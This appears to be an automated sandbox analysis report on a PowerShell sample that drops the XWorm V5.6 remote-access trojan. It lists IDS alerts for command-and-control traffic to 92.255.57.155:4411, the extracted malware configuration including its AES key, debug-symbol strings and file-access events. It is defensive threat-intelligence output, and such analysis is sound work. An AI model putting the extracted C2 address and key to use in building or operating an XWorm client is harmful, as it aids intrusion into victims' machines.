          2024-12-29T09:50:05.714918+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:05.913851+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:06.060632+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:07.000734+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:07.120152+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:07.379532+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:07.540764+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:07.660213+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:08.473940+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:08.913204+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:09.043552+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:09.163558+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:10.085689+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:10.944601+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:11.597885+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:11.760592+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:12.783218+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:12.879169+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:13.092410+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:13.215338+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:13.347191+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:13.508742+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:13.630052+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:14.664090+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:14.817332+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:14.980694+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:15.106876+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:15.228324+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:16.796283+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:16.856975+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:17.195385+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:17.476686+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:17.639428+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:18.599894+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:18.814311+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:18.933617+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:19.292357+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:20.837412+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:21.076005+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:21.539311+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:21.656884+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:22.416426+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:23.153286+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:23.321307+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:23.440756+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:23.560131+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:23.679769+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:23.801288+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:24.829139+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:24.948706+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:25.454744+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:25.525094+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:25.765302+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:26.616898+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:26.815774+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:27.054545+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:27.432692+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:27.733196+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:27.993193+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:28.915978+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:29.175217+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:29.266101+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:29.336681+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:29.567348+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:30.269550+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:30.944889+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:31.173180+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:31.388108+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:31.507470+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:31.635975+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:32.361841+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:34.039288+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:34.737075+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:34.910964+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:35.030635+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:36.403723+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:37.054426+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:37.269208+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:37.388514+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:37.788142+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:38.081916+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:38.881240+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:39.125210+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:39.245347+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:39.365182+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:39.485076+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:39.604568+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:40.586807+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:40.799214+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:40.918759+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:41.421216+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:41.632142+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:42.725987+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:43.124721+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:43.309216+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:43.457218+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:43.624505+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:44.267988+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:44.955130+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:45.946339+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:46.243164+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:47.070658+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:47.192304+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:47.401428+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:47.488304+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:48.163875+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:48.840868+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:49.004491+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:49.124073+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:49.337934+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:49.576067+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:51.362069+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:51.648618+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:51.988006+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:53.731329+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:54.820056+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:55.058821+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:55.275245+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:55.527332+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:55.700544+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:55.903636+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:56.741940+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:56.925894+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:57.072634+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:57.235446+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:57.298726+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:50:58.684333+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:00.101454+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:00.435977+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:00.731439+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:01.053669+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:01.223506+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:01.462274+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:01.852300+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:02.466846+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:02.644798+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:03.038662+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:03.666431+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:03.876501+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:04.159384+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:04.796099+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:04.868680+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:05.147864+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:05.271370+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:05.451332+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:05.575348+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          2024-12-29T09:51:06.024480+010028529231Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-29T09:49:29.301964+010028588011Malware Command and Control Activity Detected92.255.57.1554411192.168.2.449730TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-29T09:50:09.622287+010028587991Malware Command and Control Activity Detected192.168.2.44973092.255.57.1554411TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
          Source: 92.255.57.155.ps1Virustotal: Detection: 8%Perma Link
          Source: 92.255.57.155.ps1ReversingLabs: Detection: 13%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmpString decryptor: 92.255.57.155
          Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmpString decryptor: 4411
          Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmpString decryptor: P0WER
          Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmpString decryptor: <Xwormmm>
          Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmpString decryptor: XWorm V5.6
          Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmpString decryptor: USB.exe
          Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbT source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Xml.ni.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDBs source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000C32000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdbSystem.Management.ni.dll source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004F60000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdbRSDS source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\exe\RegSvcs.pdbX source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004F60000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: n.pdb source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: n0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000C32000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1680199968.000001B58A454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680199968.000001B589398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1701713981.000001B5A1990000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbs source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000C32000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbUV source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Xml.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbP source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: Microsoft.VisualBasic.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: System.Core.ni.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: %%.pdb source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Windows.Forms.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: Microsoft.VisualBasic.pdblX source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004FA0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp, WERD6CE.tmp.dmp.10.dr
          Source: Binary string: System.Configuration.pdbMZ source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: System.Windows.Forms.pdb\mbqD0 source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb?U% source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Drawing.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: System.Management.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: mscorlib.ni.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.ni.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: System.Core.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004F60000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004F60000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: System.ni.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WERD6CE.tmp.dmp.10.dr
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49730 -> 92.255.57.155:4411
          Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 92.255.57.155:4411 -> 192.168.2.4:49730
          Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49730 -> 92.255.57.155:4411
          Source: Network trafficSuricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 92.255.57.155:4411 -> 192.168.2.4:49730
          Source: Network trafficSuricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49730 -> 92.255.57.155:4411
          Source: Malware configuration extractorURLs: 92.255.57.155
          Source: Yara matchFile source: 0.2.powershell.exe.1b599389800.4.raw.unpack, type: UNPACKEDPE
          Source: global trafficTCP traffic: 192.168.2.4:49730 -> 92.255.57.155:4411
          Source: Joe Sandbox ViewIP Address: 92.255.57.155 92.255.57.155
          Source: Joe Sandbox ViewASN Name: TELSPRU TELSPRU
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
